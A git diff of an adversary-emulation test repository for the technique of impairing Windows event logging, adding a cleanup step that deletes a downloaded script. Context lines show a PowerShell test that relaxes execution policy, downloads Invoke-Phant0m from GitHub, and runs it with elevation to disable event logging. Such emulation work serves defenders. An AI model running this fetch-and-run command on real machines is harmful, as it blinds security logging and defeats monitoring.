diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8de7dd82..9b010138 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -29356,7 +29356,7 @@ defense-evasion:
       supported_platforms:
       - windows
       executor:
-        command: |-
+        command: |
           Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
           $url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
           $output = "$env:TEMP\Invoke-Phant0m.ps1"
@@ -29365,8 +29365,9 @@ defense-evasion:
           cd $env:TEMP
           Import-Module .\Invoke-Phant0m.ps1
           Invoke-Phant0m
-        cleanup_command: Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS"
-          -fore red
+        cleanup_command: |
+          Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
+          Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
         name: powershell
         elevation_required: true
     - name: Impair Windows Audit Log Policy
diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md
index 6089a6b1..1ca11b6f 100644
--- a/atomics/T1562.002/T1562.002.md
+++ b/atomics/T1562.002/T1562.002.md
@@ -81,6 +81,7 @@ Invoke-Phant0m
 #### Cleanup Commands:
 ```powershell
 Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
+Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
 ```